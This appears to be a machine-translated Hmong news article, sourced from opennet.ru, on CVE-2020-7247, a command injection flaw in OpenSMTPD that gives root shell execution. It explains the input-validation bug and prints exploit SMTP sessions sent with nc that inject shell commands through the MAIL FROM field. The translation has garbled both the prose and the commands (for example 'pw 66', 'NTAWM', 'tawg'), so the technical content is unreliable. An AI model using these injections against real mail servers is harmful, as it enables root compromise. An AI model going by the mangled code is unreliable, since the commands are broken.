🥇Vulnerability nyob rau hauv OpenSTPD uas tso cai rau cov chaw taws teeb tswj kev ua haujlwm nrog cov cai hauv paus

Nyob rau hauv mail server tsim los ntawm OpenBSD project OpenSMTPD txheeb xyuas tseem ceeb heev vulnerability (CVE-2020-7247), uas tso cai rau koj los ua cov lus txib ntawm lub plhaub ntawm lub server nrog cov cai hauv paus. Qhov teeb meem raug txheeb xyuas thaum rov tshawb xyuas los ntawm Qualys Kev Ruaj Ntseg (yav dhau los OpenSMTPD kev tshuaj xyuas tau ua nyob rau hauv 2015, thiab qhov tsis zoo tshiab tau tshwm sim txij li lub Tsib Hlis 2018). Teeb meem tshem tawm hauv OpenSMTPD 6.6.2 tso tawm. Txhua tus neeg siv tau pom zoo kom nruab qhov hloov tshiab tam sim ntawd (rau OpenBSD, thaj tuaj yeem ntsia tau ntawm syspatch).

Muaj ob txoj kev xaiv tawm tsam. Thawj qhov kev xaiv ua haujlwm nyob rau hauv lub neej ntawd OpenSMTPD teeb tsa (tsuas yog txais kev thov los ntawm localhost) thiab tso cai rau koj los siv qhov teeb meem hauv zos, thaum tus neeg tawm tsam tuaj yeem nkag mus rau hauv lub zos network interface (loopback) ntawm lub server (piv txwv li, ntawm hosting systems) . Qhov kev xaiv thib ob tshwm sim thaum OpenSTPD tau teeb tsa kom tau txais kev thov sab nraud (ib lub chaw xa ntawv uas lees txais cov ntawv thib peb). Cov kws tshawb fawb tau npaj ib tsab qauv ntawm kev siv uas ua haujlwm tau zoo nrog OpenSMTPD version suav nrog OpenBSD 6.6 thiab nrog rau cov ntawv nqa tau yooj yim rau lwm qhov kev khiav haujlwm (ua hauv Debian Testing).

Qhov teeb meem yog tshwm sim los ntawm qhov yuam kev hauv smtp_mailaddr() muaj nuj nqi, uas yog hu mus xyuas qhov tseeb ntawm qhov tseem ceeb nyob rau hauv "MAIL FROM" thiab "RCPT TO" teb uas txhais cov neeg xa khoom / tus neeg txais thiab tau dhau los thaum lub sijhawm sib txuas. nrog mail server. Txhawm rau txheeb xyuas qhov chaw nyob email uas tuaj ua ntej lub cim “@”, smtp_mailaddr() muaj nuj nqi hu ua
valid_localpart(), uas txiav txim siab cov cim "!#$%&'*/?^`{|}~+-=_" kom siv tau (MAILADDR_ALLOWED), raws li xav tau los ntawm RFC 5322.

Hauv qhov no, kev khiav ncaj qha ntawm txoj hlua tau ua tiav hauv mda_expand_token() ua haujlwm, uas tsuas yog hloov cov cim "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). Tom qab ntawd, cov kab npaj hauv mda_expand_token() yog siv thaum hu rau tus neeg xa khoom (MDA) siv cov lus txib 'execle("/bin/sh", "/bin/sh", "-c", mda_command, ...' . Nyob rau hauv rooj plaub uas tso cov ntawv rau mbox ntawm /bin/sh, kab “/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}” yog launched, qhov twg tus nqi “% {mbox.from}" suav nrog cov ntaub ntawv khiav tawm los ntawm "MAIL FROM" parameter.

Lub ntsiab lus ntawm qhov tsis muaj zog yog tias smtp_mailaddr() muaj qhov yuam kev, vim tias, yog tias ib qho chaw khoob raug xa mus rau email, txoj haujlwm rov qab ua tiav cov lej pov thawj, txawm tias ib feem ntawm qhov chaw nyob ua ntej "@" muaj cov cim tsis raug. . Ntxiv mus, thaum npaj ib txoj hlua, mda_expand_token() kev ua haujlwm tsis khiav tawm tag nrho cov cim tshwj xeeb ntawm lub plhaub, tab sis tsuas yog cov cim tshwj xeeb tso cai rau hauv email chaw nyob. Yog li, txhawm rau khiav koj cov lus txib, nws txaus los siv lub cim ";" hauv ib cheeb tsam ntawm email. thiab qhov chaw, uas tsis suav nrog hauv MAILADDR_ESCAPE teeb thiab tsis khiav tawm. Piv txwv li:

$nc 127.0.0.1 25

HELO professor.falken
MAIL NTAWM:<;pw 66;>
RCPT rau:
NTAUB NTAWV
.
QUIT

Tom qab qhov kev sib kho no, OpenSMTPD, thaum xa mus rau mbox, yuav tso cov lus txib los ntawm lub plhaub

/usr/libexec/mail.local -f ;pw 66; hauv paus

Nyob rau tib lub sijhawm, qhov kev tawm tsam tuaj yeem raug txwv los ntawm qhov tseeb tias qhov chaw nyob hauv zos tsis tuaj yeem tshaj 64 tus cim, thiab cov cim tshwj xeeb '$' thiab '|' yog hloov nrog ":" thaum khiav. Txhawm rau hla qhov kev txwv no, peb siv qhov tseeb tias lub cev ntawm tsab ntawv raug xa mus tom qab khiav /usr/libexec/mail.local los ntawm cov dej nkag, i.e. Los ntawm kev tswj qhov chaw nyob, koj tsuas tuaj yeem tso tus neeg txhais lus sh txib thiab siv lub cev ntawm tsab ntawv raws li cov lus qhia. Txij li cov kev pabcuam SMTP headers tau qhia thaum pib ntawm tsab ntawv, nws tau hais kom siv cov lus txib nyeem hauv lub voj kom hla lawv. Ib qho kev siv nyiaj ua haujlwm zoo li no:

$nc 192.168.56.143 25

HELO professor.falken
MAIL NTAWM:<;rau kuv hauv 0 1 2 3 4 5 6 7 8 9 abcd;do read r;done;sh;exit 0;>
RCPT rau:[email tiv thaiv]>
NTAUB NTAWV
#0
#1
...
#d
rau kuv hauv WOPR; ua
echo -n "($i)" && id || tawg
ua> /root/x."`id -u`.""$$"
.
QUIT

Tau qhov twg los: opennet.ru

Vulnerability nyob rau hauv OpenSMTPD uas tso cai rau tej thaj chaw deb code execution nrog lub hauv paus cai

Ntxiv ib saib Отменить ответ